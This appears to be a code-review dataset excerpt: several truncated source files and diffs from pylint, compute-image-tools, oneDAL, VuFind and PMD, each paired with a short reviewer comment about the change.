is_classdef_type(n): self.add_message("unsupported-binary-operation", args=msg, node=node) break @check_messages("unsupported-binary-operation") def _visit_binop(self, node): """Detect TypeErrors for binary arithmetic operands.""" self._check_binop_errors(node) @check_messages("unsupported-binary-operation") def _visit_augassign(self, node): """Detect TypeErrors for augmented binary arithmetic operands.""" self._check_binop_errors(node) def _check_binop_errors(self, node): for error in node.type_errors(): # Let the error customize its output. if any( isinstance(obj, nodes.ClassDef) and not has_known_bases(obj) for obj in (error.left_type, error.right_type) ): continue self.add_message("unsupported-binary-operation", args=str(error), node=node) def _check_membership_test(self, node): if is_inside_abstract_class(node): return if is_comprehension(node): return inferred = safe_infer(node) if inferred is None or inferred is astroid.Uninferable: return if not supports_membership_test(inferred): self.add_message( "unsupported-membership-test", args=node.as_string(), node=node ) @check_messages("unsupported-membership-test") def visit_compare(self, node): if len(node.ops) != 1: return op, right = node.ops[0] if op in ["in", "not in"]: self._check_membership_test(right) @check_messages( "unsubscriptable-object", "unsupported-assignment-operation", "unsupported-delete-operation", "unhashable-dict-key", "invalid-sequence-index", "invalid-slice-index", ) def visit_subscript(self, node): self._check_invalid_sequence_index(node) supported_protocol = None if isinstance(node.value, (nodes.ListComp, nodes.DictComp)): return if isinstance(node.value, nodes.Dict): # Assert dict key is hashable inferred = safe_infer(node.slice) if inferred not in (None, astroid.Uninferable): try: hash_fn = next(inferred.igetattr("__hash__")) except astroid.InferenceError: pass else: if getattr(hash_fn, "value", True) is None: self.add_message("unhashable-dict-key", node=node.value) if node.ctx == astroid.Load: supported_protocol = supports_getitem msg = "unsubscriptable-object" elif node.ctx == astroid.Store: supported_protocol = supports_setitem msg = "unsupported-assignment-operation" elif node.ctx == astroid.Del: supported_protocol = supports_delitem msg = "unsupported-delete-operation" if isinstance(node.value, nodes.SetComp): self.add_message(msg, args=node.value.as_string(), node=node.value) return if is_inside_abstract_class(node): return inferred = safe_infer(node.value) if inferred is None or inferred is astroid.Uninferable: return if getattr(inferred, "decorators", None): first_decorator = astroid.helpers.safe_infer(inferred.decorators.nodes[0]) if isinstance(first_decorator, nodes.ClassDef): inferred = first_decorator.instantiate_class() else: return # It would be better to handle function # decorators, but let's start slow. if not supported_protocol(inferred, node): self.add_message(msg, args=node.value.as_string(), node=node.value) @check_messages("dict-items-missing-iter") def visit_for(self, node): if not isinstance(node.target, nodes.Tuple): # target is not a tuple return if not len(node.target.elts) == 2: # target is not a tuple of two elements return iterable = node.iter if not isinstance(iterable, nodes.Name): # it's not a bare variable return inferred = safe_infer(iterable) if not inferred: return if not isinstance(inferred, nodes.Dict): # the iterable is not a dict return self.add_message("dict-iter-missing-items", node=node) class IterableChecker(BaseChecker): """ Checks for non-iterables used in an iterable context. Contexts include: - for-statement - starargs in function call - `yield from`-statement - list, dict and set comprehensions - generator expressions Also checks for non-mappings in function call kwargs. """ __implements__ = (IAstroidChecker,) name = "typecheck" msgs = { "E1133": ( "Non-iterable value %s is used in an iterating context", "not-an-iterable", "Used when a non-iterable value is used in place where " "iterable is expected", ), "E1134": ( "Non-mapping value %s is used in a mapping context", "not-a-mapping", "Used when a non-mapping value is used in place where " "mapping is expected", ), } @staticmethod def _is_asyncio_coroutine(node): if not isinstance(node, nodes.Call): return False inferred_func = safe_infer(node.func) if not isinstance(inferred_func, nodes.FunctionDef): return False if not inferred_func.decorators: return False for decorator in inferred_func.decorators.nodes: inferred_decorator = safe_infer(decorator) if not isinstance(inferred_decorator, nodes.FunctionDef): continue if inferred_decorator.qname() != ASYNCIO_COROUTINE: continue return True return False def _check_iterable(self, node, check_async=False): if is_inside_abstract_class(node) or is_comprehension(node): return inferred = safe_infer(node) if not inferred: return if not is_iterable(inferred, check_async=check_async): self.add_message("not-an-iterable", args=node.as_string(), node=node) def _check_mapping(self, node): if is_inside_abstract_class(node): return if isinstance(node, nodes.DictComp): return inferred = safe_infer(node) if inferred is None or inferred is astroid.Uninferable: return if not is_mapping(inferred): self.add_message("not-a-mapping", args=node.as_string(), node=node) @check_messages("not-an-iterable") def visit_for(self, node): self._check_iterable(node.iter) @check_messages("not-an-iterable") def visit_asyncfor(self, node): self._check_iterable(node.iter, check_async=True) @check_messages("not-an-iterable") def visit_yieldfrom(self, node): if self._is_asyncio_coroutine(node.value): return self._check_iterable(node.value) @check_messages("not-an-iterable", "not-a-mapping") def visit_call(self, node): for stararg in node.starargs: self._check_iterable(stararg.value) for kwarg in node.kwargs: self._check_mapping(kwarg.value) @check_messages("not-an-iterable") def visit_listcomp(self, node): for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_dictcomp(self, node): for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_setcomp(self, node): for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_generatorexp(self, node): for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("await-outside-async") def visit_await(self, node: nodes.Await) -> None: self._check_await_outside_coroutine(node) def _check_await_outside_coroutine(self, node: nodes.Await) -> None: node_scope = node.scope() while not isinstance(node_scope, nodes.Module): if isinstance(node_scope, nodes.AsyncFunctionDef): return if isinstance(node_scope, nodes.FunctionDef): break node_scope = node_scope.parent.scope() self.add_message("await-outside-async", node=node) def register(linter): """required method to auto register this checker""" linter.register_checker(TypeChecker(linter)) linter.register_checker(IterableChecker(linter))
1
15,293
`PY310` should probably be imported from `pylint.const`
PyCQA-pylint
py
@@ -37,6 +37,14 @@ func (w workflowLoggable) GetValue(key string) string { return w.wf.GetSerialConsoleOutputValue(key) } +func (w workflowLoggable) GetValueAsBool(key string) bool { + v, err := strconv.ParseBool(w.wf.GetSerialConsoleOutputValue(key)) + if err != nil { + return false + } + return v +} + func (w workflowLoggable) GetValueAsInt64Slice(key string) []int64 { return getInt64Values(w.wf.GetSerialConsoleOutputValue(key)) }
1
// Copyright 2020 Google Inc. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package service import ( "strconv" "strings" "github.com/GoogleCloudPlatform/compute-image-tools/daisy" ) // NewLoggableFromWorkflow provides a Loggable from a daisy workflow. func NewLoggableFromWorkflow(wf *daisy.Workflow) Loggable { if wf == nil { return nil } return workflowLoggable{wf: wf} } type workflowLoggable struct { wf *daisy.Workflow } func (w workflowLoggable) GetValue(key string) string { return w.wf.GetSerialConsoleOutputValue(key) } func (w workflowLoggable) GetValueAsInt64Slice(key string) []int64 { return getInt64Values(w.wf.GetSerialConsoleOutputValue(key)) } func (w workflowLoggable) ReadSerialPortLogs() []string { if w.wf.Logger != nil { logs := w.wf.Logger.ReadSerialPortLogs() view := make([]string, len(logs)) copy(view, logs) return view } return nil } func getInt64Values(s string) []int64 { strs := strings.Split(s, ",") var r []int64 for _, str := range strs { i, err := strconv.ParseInt(str, 0, 64) if err == nil { r = append(r, i) } } return r }
1
12,150
Can we propagate this error up the stack?
GoogleCloudPlatform-compute-image-tools
go
@@ -83,7 +83,12 @@ public: const table& result_values) { auto reference = compute_reference(sigma, x_data, y_data); const double tol = te::get_tolerance<Float>(1e-4, 1e-9); - const double diff = la::l_inf_norm(reference, la::matrix<double>::wrap(result_values)); + const table reference_table = dal::detail::homogen_table_builder{} + .reset(reference.get_array(), + reference.get_row_count(), + reference.get_column_count()) + .build(); + const double diff = te::abs_error(reference_table, result_values); CHECK(diff < tol); }
1
/******************************************************************************* * Copyright 2021 Intel Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *******************************************************************************/ #include "oneapi/dal/algo/rbf_kernel/compute.hpp" #include "oneapi/dal/test/engine/common.hpp" #include "oneapi/dal/test/engine/fixtures.hpp" #include "oneapi/dal/test/engine/dataframe.hpp" #include "oneapi/dal/test/engine/math.hpp" namespace oneapi::dal::rbf_kernel::test { namespace te = dal::test::engine; namespace la = te::linalg; template <typename TestType> class rbf_kernel_batch_test : public te::algo_fixture { public: using Float = std::tuple_element_t<0, TestType>; using Method = std::tuple_element_t<1, TestType>; auto get_descriptor(double sigma) const { return rbf_kernel::descriptor<Float, Method>{}.set_sigma(sigma); } te::table_id get_homogen_table_id() const { return te::table_id::homogen<Float>(); } void general_checks(const te::dataframe& x_data, const te::dataframe& y_data, double sigma, const te::table_id& x_data_table_id, const te::table_id& y_data_table_id) { CAPTURE(sigma); const table x = x_data.get_table(this->get_policy(), x_data_table_id); const table y = y_data.get_table(this->get_policy(), y_data_table_id); INFO("create descriptor") const auto rbf_kernel_desc = get_descriptor(sigma); INFO("run compute"); const auto compute_result = this->compute(rbf_kernel_desc, x, y); check_compute_result(sigma, x, y, compute_result); } void check_compute_result(double sigma, const table& x_data, const table& y_data, const rbf_kernel::compute_result<>& result) { const auto result_values = result.get_values(); SECTION("result values table shape is expected") { REQUIRE(result_values.get_row_count() == x_data.get_row_count()); REQUIRE(result_values.get_column_count() == y_data.get_row_count()); } SECTION("there is no NaN in result values table") { REQUIRE(te::has_no_nans(result_values)); } SECTION("result values are expected") { check_result_values(sigma, x_data, y_data, result_values); } } void check_result_values(double sigma, const table& x_data, const table& y_data, const table& result_values) { auto reference = compute_reference(sigma, x_data, y_data); const double tol = te::get_tolerance<Float>(1e-4, 1e-9); const double diff = la::l_inf_norm(reference, la::matrix<double>::wrap(result_values)); CHECK(diff < tol); } la::matrix<double> compute_reference(double sigma, const table& x_data, const table& y_data) { const auto x_data_matrix = la::matrix<double>::wrap(x_data); const auto y_data_matrix = la::matrix<double>::wrap(y_data); const auto row_count_x = x_data_matrix.get_row_count(); const auto row_count_y = y_data_matrix.get_row_count(); const auto column_count = x_data_matrix.get_column_count(); auto reference = la::matrix<double>::full({ row_count_x, row_count_y }, 0.0); const double inv_sigma = 1.0 / (sigma * sigma); for (std::int64_t i = 0; i < row_count_x; i++) for (std::int64_t j = 0; j < row_count_y; j++) { for (std::int64_t k = 0; k < column_count; k++) { double diff = x_data_matrix.get(i, k) - y_data_matrix.get(j, k); reference.set(i, j) += diff * diff; } reference.set(i, j) = std::exp(-0.5 * inv_sigma * reference.get(i, j)); } return reference; } }; using rbf_kernel_types = COMBINE_TYPES((float, double), (rbf_kernel::method::dense)); TEMPLATE_LIST_TEST_M(rbf_kernel_batch_test, "rbf_kernel common flow", "[rbf_kernel][integration][batch]", rbf_kernel_types) { const te::dataframe x_data = GENERATE_DATAFRAME(te::dataframe_builder{ 50, 50 }.fill_uniform(-3, 3, 7777), te::dataframe_builder{ 100, 50 }.fill_uniform(-3, 3, 7777), te::dataframe_builder{ 250, 50 }.fill_uniform(-3, 3, 7777), te::dataframe_builder{ 1100, 50 }.fill_uniform(-3, 3, 7777)); // Homogen floating point type is the same as algorithm's floating point type const auto x_data_table_id = this->get_homogen_table_id(); const te::dataframe y_data = GENERATE_DATAFRAME(te::dataframe_builder{ 50, 50 }.fill_uniform(-3, 3, 7777), te::dataframe_builder{ 100, 50 }.fill_uniform(-3, 3, 8888), te::dataframe_builder{ 200, 50 }.fill_uniform(-3, 3, 8888), te::dataframe_builder{ 1000, 50 }.fill_uniform(-3, 3, 8888)); // Homogen floating point type is the same as algorithm's floating point type const auto y_data_table_id = this->get_homogen_table_id(); const double sigma = GENERATE_COPY(0.8, 1.0, 5.0); this->general_checks(x_data, y_data, sigma, x_data_table_id, y_data_table_id); } TEMPLATE_LIST_TEST_M(rbf_kernel_batch_test, "rbf_kernel compute one element matrix", "[rbf_kernel][integration][batch]", rbf_kernel_types) { const te::dataframe x_data = GENERATE_DATAFRAME(te::dataframe_builder{ 1, 1 }.fill_uniform(-3, 3, 7777)); // Homogen floating point type is the same as algorithm's floating point type const auto x_data_table_id = this->get_homogen_table_id(); const te::dataframe y_data = GENERATE_DATAFRAME(te::dataframe_builder{ 1, 1 }.fill_uniform(-3, 3, 8888)); // Homogen floating point type is the same as algorithm's floating point type const auto y_data_table_id = this->get_homogen_table_id(); const double sigma = GENERATE_COPY(0.8, 1.0, 5.0); this->general_checks(x_data, y_data, sigma, x_data_table_id, y_data_table_id); } } // namespace oneapi::dal::rbf_kernel::test
1
27,588
Why reference is converted to table?
oneapi-src-oneDAL
cpp
@@ -203,16 +203,15 @@ struct roots_view *view_at(struct roots_desktop *desktop, double lx, double ly, struct roots_desktop *desktop_create(struct roots_server *server, struct roots_config *config) { struct roots_desktop *desktop = calloc(1, sizeof(struct roots_desktop)); + assert(desktop); wlr_log(L_DEBUG, "Initializing roots desktop"); assert(desktop->views = list_create()); wl_list_init(&desktop->outputs); - wl_list_init(&desktop->output_add.link); - desktop->output_add.notify = output_add_notify; - wl_list_init(&desktop->output_remove.link); - desktop->output_remove.notify = output_remove_notify; + desktop->output_add.notify = output_add_notify; wl_signal_add(&server->backend->events.output_add, &desktop->output_add); + desktop->output_remove.notify = output_remove_notify; wl_signal_add(&server->backend->events.output_remove, &desktop->output_remove);
1
#define _POSIX_C_SOURCE 199309L #include <assert.h> #include <time.h> #include <stdlib.h> #include <math.h> #include <wlr/types/wlr_box.h> #include <wlr/types/wlr_compositor.h> #include <wlr/types/wlr_cursor.h> #include <wlr/types/wlr_gamma_control.h> #include <wlr/types/wlr_output_layout.h> #include <wlr/types/wlr_wl_shell.h> #include <wlr/types/wlr_xdg_shell_v6.h> #include <wlr/util/log.h> #include "rootston/desktop.h" #include "rootston/server.h" void view_destroy(struct roots_view *view) { struct roots_desktop *desktop = view->desktop; struct roots_input *input = desktop->server->input; if (input->active_view == view) { input->active_view = NULL; input->mode = ROOTS_CURSOR_PASSTHROUGH; } if (input->last_active_view == view) { input->last_active_view = NULL; } for (size_t i = 0; i < desktop->views->length; ++i) { struct roots_view *_view = desktop->views->items[i]; if (view == _view) { list_del(desktop->views, i); break; } } free(view); } void view_get_size(struct roots_view *view, struct wlr_box *box) { if (view->get_size) { view->get_size(view, box); return; } box->x = box->y = 0; box->width = view->wlr_surface->current->width; box->height = view->wlr_surface->current->height; } void view_set_position(struct roots_view *view, double x, double y) { if (view->set_position) { view->set_position(view, x, y); return; } view->x = x; view->y = y; } void view_activate(struct roots_view *view, bool activate) { if (view->activate) { view->activate(view, activate); } } void view_resize(struct roots_view *view, uint32_t width, uint32_t height) { if (view->resize) { view->resize(view, width, height); } } void view_close(struct roots_view *view) { if (view->close) { view->close(view); } } bool view_center(struct roots_view *view) { struct wlr_box size; view_get_size(view, &size); struct roots_desktop *desktop = view->desktop; struct wlr_cursor *cursor = desktop->server->input->cursor; struct wlr_output *output = wlr_output_layout_output_at(desktop->layout, cursor->x, cursor->y); if (!output) { output = wlr_output_layout_get_center_output(desktop->layout); } if (!output) { // empty layout return false; } const struct wlr_output_layout_output *l_output = wlr_output_layout_get(desktop->layout, output); int width, height; wlr_output_effective_resolution(output, &width, &height); view->x = (double)(width - size.width) / 2 + l_output->x; view->y = (double)(height - size.height) / 2 + l_output->y; return true; } void view_initialize(struct roots_view *view) { view_center(view); struct roots_input *input = view->desktop->server->input; set_view_focus(input, view->desktop, view); wlr_seat_keyboard_notify_enter(input->wl_seat, view->wlr_surface); } struct roots_view *view_at(struct roots_desktop *desktop, double lx, double ly, struct wlr_surface **surface, double *sx, double *sy) { for (int i = desktop->views->length - 1; i >= 0; --i) { struct roots_view *view = desktop->views->items[i]; if (view->type == ROOTS_WL_SHELL_VIEW && view->wl_shell_surface->state == WLR_WL_SHELL_SURFACE_STATE_POPUP) { continue; } double view_sx = lx - view->x; double view_sy = ly - view->y; struct wlr_box box = { .x = 0, .y = 0, .width = view->wlr_surface->current->buffer_width, .height = view->wlr_surface->current->buffer_height, }; if (view->rotation != 0.0) { // Coordinates relative to the center of the view double ox = view_sx - (double)box.width/2, oy = view_sy - (double)box.height/2; // Rotated coordinates double rx = cos(view->rotation)*ox - sin(view->rotation)*oy, ry = cos(view->rotation)*oy + sin(view->rotation)*ox; view_sx = rx + (double)box.width/2; view_sy = ry + (double)box.height/2; } if (view->type == ROOTS_XDG_SHELL_V6_VIEW) { // TODO: test if this works with rotated views double popup_sx, popup_sy; struct wlr_xdg_surface_v6 *popup = wlr_xdg_surface_v6_popup_at(view->xdg_surface_v6, view_sx, view_sy, &popup_sx, &popup_sy); if (popup) { *sx = view_sx - popup_sx; *sy = view_sy - popup_sy; *surface = popup->surface; return view; } } if (view->type == ROOTS_WL_SHELL_VIEW) { // TODO: test if this works with rotated views double popup_sx, popup_sy; struct wlr_wl_shell_surface *popup = wlr_wl_shell_surface_popup_at(view->wl_shell_surface, view_sx, view_sy, &popup_sx, &popup_sy); if (popup) { *sx = view_sx - popup_sx; *sy = view_sy - popup_sy; *surface = popup->surface; return view; } } double sub_x, sub_y; struct wlr_subsurface *subsurface = wlr_surface_subsurface_at(view->wlr_surface, view_sx, view_sy, &sub_x, &sub_y); if (subsurface) { *sx = view_sx - sub_x; *sy = view_sy - sub_y; *surface = subsurface->surface; return view; } if (wlr_box_contains_point(&box, view_sx, view_sy) && pixman_region32_contains_point( &view->wlr_surface->current->input, view_sx, view_sy, NULL)) { *sx = view_sx; *sy = view_sy; *surface = view->wlr_surface; return view; } } return NULL; } struct roots_desktop *desktop_create(struct roots_server *server, struct roots_config *config) { struct roots_desktop *desktop = calloc(1, sizeof(struct roots_desktop)); wlr_log(L_DEBUG, "Initializing roots desktop"); assert(desktop->views = list_create()); wl_list_init(&desktop->outputs); wl_list_init(&desktop->output_add.link); desktop->output_add.notify = output_add_notify; wl_list_init(&desktop->output_remove.link); desktop->output_remove.notify = output_remove_notify; wl_signal_add(&server->backend->events.output_add, &desktop->output_add); wl_signal_add(&server->backend->events.output_remove, &desktop->output_remove); desktop->server = server; desktop->config = config; desktop->layout = wlr_output_layout_create(); desktop->compositor = wlr_compositor_create(server->wl_display, server->renderer); desktop->xdg_shell_v6 = wlr_xdg_shell_v6_create(server->wl_display); wl_signal_add(&desktop->xdg_shell_v6->events.new_surface, &desktop->xdg_shell_v6_surface); desktop->xdg_shell_v6_surface.notify = handle_xdg_shell_v6_surface; desktop->wl_shell = wlr_wl_shell_create(server->wl_display); wl_signal_add(&desktop->wl_shell->events.new_surface, &desktop->wl_shell_surface); desktop->wl_shell_surface.notify = handle_wl_shell_surface; #ifdef HAS_XWAYLAND if (config->xwayland) { desktop->xwayland = wlr_xwayland_create(server->wl_display, desktop->compositor); wl_signal_add(&desktop->xwayland->events.new_surface, &desktop->xwayland_surface); desktop->xwayland_surface.notify = handle_xwayland_surface; } #endif desktop->gamma_control_manager = wlr_gamma_control_manager_create( server->wl_display); desktop->screenshooter = wlr_screenshooter_create(server->wl_display, server->renderer); return desktop; } void desktop_destroy(struct roots_desktop *desktop) { // TODO }
1
8,625
You shouldn't use assert for runtime errors.
swaywm-wlroots
c
@@ -15,6 +15,7 @@ return array( 'vendor/bootstrap.min.js', 'vendor/bootstrap-accessibility.min.js', 'vendor/validator.min.js', + 'vendor/form-attr-polyfill.js', // input[form] polyfill, cannot load conditionally, since we need all versions of IE 'autocomplete.js', 'common.js', 'lightbox.js',
1
<?php return array( 'extends' => 'root', 'css' => array( //'vendor/bootstrap.min.css', //'vendor/bootstrap-accessibility.css', //'vendor/font-awesome.min.css', //'bootstrap-custom.css', 'compiled.css', 'print.css:print', ), 'js' => array( 'vendor/base64.js:lt IE 10', // btoa polyfill 'vendor/jquery.min.js', 'vendor/bootstrap.min.js', 'vendor/bootstrap-accessibility.min.js', 'vendor/validator.min.js', 'autocomplete.js', 'common.js', 'lightbox.js', ), 'less' => array( 'active' => false, 'compiled.less' ), 'favicon' => 'vufind-favicon.ico', 'helpers' => array( 'factories' => array( 'flashmessages' => 'VuFind\View\Helper\Bootstrap3\Factory::getFlashmessages', 'layoutclass' => 'VuFind\View\Helper\Bootstrap3\Factory::getLayoutClass', 'recaptcha' => 'VuFind\View\Helper\Bootstrap3\Factory::getRecaptcha', ), 'invokables' => array( 'highlight' => 'VuFind\View\Helper\Bootstrap3\Highlight', 'search' => 'VuFind\View\Helper\Bootstrap3\Search' ) ) );
1
24,447
Does this really belong in the vendor directory if you wrote it? At very least, should it get its own repo somewhere in addition to being dropped here?
vufind-org-vufind
php
@@ -78,7 +78,7 @@ public class PMDTaskTest { String actual = IOUtils.toString(in, StandardCharsets.UTF_8); // remove any trailing newline actual = actual.replaceAll("\n|\r", ""); - Assert.assertEquals("sample.dummy:0:\tTest Rule 2", actual); + Assert.assertEquals("sample.dummy:0:\tTest Rule 2:\tSampleXPathRule", actual); } } }
1
/** * BSD-style license; for more info see http://pmd.sourceforge.net/license.html */ package net.sourceforge.pmd.ant; import static org.junit.Assert.fail; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.commons.io.IOUtils; import org.apache.tools.ant.BuildException; import org.apache.tools.ant.BuildFileRule; import org.junit.Assert; import org.junit.Before; import org.junit.Rule; import org.junit.Test; public class PMDTaskTest { @Rule public final BuildFileRule buildRule = new BuildFileRule(); @Before public void setUp() { buildRule.configureProject("src/test/resources/net/sourceforge/pmd/ant/xml/pmdtasktest.xml"); } @Test public void testFormatterWithNoToFileAttribute() { try { buildRule.executeTarget("testFormatterWithNoToFileAttribute"); fail("This should throw an exception"); } catch (BuildException ex) { Assert.assertEquals("toFile or toConsole needs to be specified in Formatter", ex.getMessage()); } } @Test public void testNoRuleSets() { try { buildRule.executeTarget("testNoRuleSets"); fail("This should throw an exception"); } catch (BuildException ex) { Assert.assertEquals("No rulesets specified", ex.getMessage()); } } @Test public void testBasic() { buildRule.executeTarget("testBasic"); } @Test public void testInvalidLanguageVersion() { try { buildRule.executeTarget("testInvalidLanguageVersion"); Assert.assertEquals( "The following language is not supported:<sourceLanguage name=\"java\" version=\"42\" />.", buildRule.getLog()); fail("This should throw an exception"); } catch (BuildException ex) { Assert.assertEquals( "The following language is not supported:<sourceLanguage name=\"java\" version=\"42\" />.", ex.getMessage()); } } @Test public void testWithShortFilenames() throws FileNotFoundException, IOException { buildRule.executeTarget("testWithShortFilenames"); try (InputStream in = new FileInputStream("target/pmd-ant-test.txt")) { String actual = IOUtils.toString(in, StandardCharsets.UTF_8); // remove any trailing newline actual = actual.replaceAll("\n|\r", ""); Assert.assertEquals("sample.dummy:0:\tTest Rule 2", actual); } } }
1
18,124
I think it would be better to place the rule name before the message. Messages are of varying lengths and the rule names will end up misaligned
pmd-pmd
java
@@ -1719,7 +1719,12 @@ class ComparisonChecker(_BasicChecker): 'Used when comparing an object to a literal, which is usually ' 'what you do not want to do, since you can compare to a different ' 'literal than what was expected altogether.'), - } + 'R0124': ('Logical tautology in comparison - %s', + 'logical-tautology', + 'Used when something is compared against itself.', + ), + + } def _check_singleton_comparison(self, singleton, root_node, negative_check=False): if singleton.value is True:
1
# -*- coding: utf-8 -*- # Copyright (c) 2006-2016 LOGILAB S.A. (Paris, FRANCE) <[email protected]> # Copyright (c) 2010 Daniel Harding <[email protected]> # Copyright (c) 2012-2014 Google, Inc. # Copyright (c) 2013-2017 Claudiu Popa <[email protected]> # Copyright (c) 2014 Brett Cannon <[email protected]> # Copyright (c) 2014 Arun Persaud <[email protected]> # Copyright (c) 2015 Nick Bastin <[email protected]> # Copyright (c) 2015 Michael Kefeder <[email protected]> # Copyright (c) 2015 Dmitry Pribysh <[email protected]> # Copyright (c) 2015 Stephane Wirtel <[email protected]> # Copyright (c) 2015 Cosmin Poieana <[email protected]> # Copyright (c) 2015 Florian Bruhin <[email protected]> # Copyright (c) 2015 Radu Ciorba <[email protected]> # Copyright (c) 2015 Ionel Cristian Maries <[email protected]> # Copyright (c) 2016-2017 Łukasz Rogalski <[email protected]> # Copyright (c) 2016 Glenn Matthews <[email protected]> # Copyright (c) 2016 Elias Dorneles <[email protected]> # Copyright (c) 2016 Ashley Whetter <[email protected]> # Copyright (c) 2016 Yannack <[email protected]> # Copyright (c) 2016 Jakub Wilk <[email protected]> # Copyright (c) 2016 Alex Jurkiewicz <[email protected]> # Copyright (c) 2017 ttenhoeve-aa <[email protected]> # Copyright (c) 2017 hippo91 <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/master/COPYING """basic checker for Python code""" import builtins import collections import itertools import sys import re import astroid import astroid.bases import astroid.scoped_nodes from pylint import checkers from pylint import exceptions from pylint import interfaces from pylint.checkers import utils from pylint import reporters from pylint.checkers.utils import get_node_last_lineno from pylint.reporters.ureports import nodes as reporter_nodes import pylint.utils as lint_utils class NamingStyle(object): # It may seem counterintuitive that single naming style # has multiple "accepted" forms of regular expressions, # but we need to special-case stuff like dunder names # in method names. CLASS_NAME_RGX = None MOD_NAME_RGX = None CONST_NAME_RGX = None COMP_VAR_RGX = None DEFAULT_NAME_RGX = None CLASS_ATTRIBUTE_RGX = None @classmethod def get_regex(cls, name_type): return { 'module': cls.MOD_NAME_RGX, 'const': cls.CONST_NAME_RGX, 'class': cls.CLASS_NAME_RGX, 'function': cls.DEFAULT_NAME_RGX, 'method': cls.DEFAULT_NAME_RGX, 'attr': cls.DEFAULT_NAME_RGX, 'argument': cls.DEFAULT_NAME_RGX, 'variable': cls.DEFAULT_NAME_RGX, 'class_attribute': cls.CLASS_ATTRIBUTE_RGX, 'inlinevar': cls.COMP_VAR_RGX, }[name_type] class SnakeCaseStyle(NamingStyle): CLASS_NAME_RGX = re.compile('[a-z_][a-z0-9_]+$') MOD_NAME_RGX = re.compile('([a-z_][a-z0-9_]*)$') CONST_NAME_RGX = re.compile('(([a-z_][a-z0-9_]*)|(__.*__))$') COMP_VAR_RGX = re.compile('[a-z_][a-z0-9_]*$') DEFAULT_NAME_RGX = re.compile('(([a-z_][a-z0-9_]{2,30})|(_[a-z0-9_]*)|(__[a-z][a-z0-9_]+__))$') CLASS_ATTRIBUTE_RGX = re.compile(r'(([a-z_][a-z0-9_]{2,30}|(__.*__)))$') class CamelCaseStyle(NamingStyle): CLASS_NAME_RGX = re.compile('[a-z_][a-zA-Z0-9]+$') MOD_NAME_RGX = re.compile('([a-z_][a-zA-Z0-9]*)$') CONST_NAME_RGX = re.compile('(([a-z_][A-Za-z0-9]*)|(__.*__))$') COMP_VAR_RGX = re.compile('[a-z_][A-Za-z0-9]*$') DEFAULT_NAME_RGX = re.compile('(([a-z_][a-zA-Z0-9]{2,30})|(__[a-z][a-zA-Z0-9_]+__))$') CLASS_ATTRIBUTE_RGX = re.compile(r'([a-z_][A-Za-z0-9]{2,30}|(__.*__))$') class PascalCaseStyle(NamingStyle): CLASS_NAME_RGX = re.compile('[A-Z_][a-zA-Z0-9]+$') MOD_NAME_RGX = re.compile('[A-Z_][a-zA-Z0-9]+$') CONST_NAME_RGX = re.compile('(([A-Z_][A-Za-z0-9]*)|(__.*__))$') COMP_VAR_RGX = re.compile('[A-Z_][a-zA-Z0-9]+$') DEFAULT_NAME_RGX = re.compile('[A-Z_][a-zA-Z0-9]{2,30}$|(__[a-z][a-zA-Z0-9_]+__)$') CLASS_ATTRIBUTE_RGX = re.compile('[A-Z_][a-zA-Z0-9]{2,30}$') class UpperCaseStyle(NamingStyle): CLASS_NAME_RGX = re.compile('[A-Z_][A-Z0-9_]+$') MOD_NAME_RGX = re.compile('[A-Z_][A-Z0-9_]+$') CONST_NAME_RGX = re.compile('(([A-Z_][A-Z0-9_]*)|(__.*__))$') COMP_VAR_RGX = re.compile('[A-Z_][A-Z0-9_]+$') DEFAULT_NAME_RGX = re.compile('([A-Z_][A-Z0-9_]{2,30})|(__[a-z][a-zA-Z0-9_]+__)$') CLASS_ATTRIBUTE_RGX = re.compile('[A-Z_][A-Z0-9_]{2,30}$') class AnyStyle(NamingStyle): @classmethod def get_regex(cls, name_type): return re.compile('.*') NAMING_STYLES = {'snake_case': SnakeCaseStyle, 'camelCase': CamelCaseStyle, 'PascalCase': PascalCaseStyle, 'UPPER_CASE': UpperCaseStyle, 'any': AnyStyle} # do not require a doc string on private/system methods NO_REQUIRED_DOC_RGX = re.compile('^_') REVERSED_PROTOCOL_METHOD = '__reversed__' SEQUENCE_PROTOCOL_METHODS = ('__getitem__', '__len__') REVERSED_METHODS = (SEQUENCE_PROTOCOL_METHODS, (REVERSED_PROTOCOL_METHOD, )) TYPECHECK_COMPARISON_OPERATORS = frozenset(('is', 'is not', '==', '!=', 'in', 'not in')) LITERAL_NODE_TYPES = (astroid.Const, astroid.Dict, astroid.List, astroid.Set) UNITTEST_CASE = 'unittest.case' BUILTINS = builtins.__name__ TYPE_QNAME = "%s.type" % BUILTINS PY33 = sys.version_info >= (3, 3) PY3K = sys.version_info >= (3, 0) PY35 = sys.version_info >= (3, 5) # Name categories that are always consistent with all naming conventions. EXEMPT_NAME_CATEGORIES = {'exempt', 'ignore'} # A mapping from builtin-qname -> symbol, to be used when generating messages # about dangerous default values as arguments DEFAULT_ARGUMENT_SYMBOLS = dict( zip(['.'.join([BUILTINS, x]) for x in ('set', 'dict', 'list')], ['set()', '{}', '[]']) ) REVERSED_COMPS = {'<': '>', '<=': '>=', '>': '<', '>=': '<='} def _redefines_import(node): """ Detect that the given node (AssignName) is inside an exception handler and redefines an import from the tryexcept body. Returns True if the node redefines an import, False otherwise. """ current = node while current and not isinstance(current.parent, 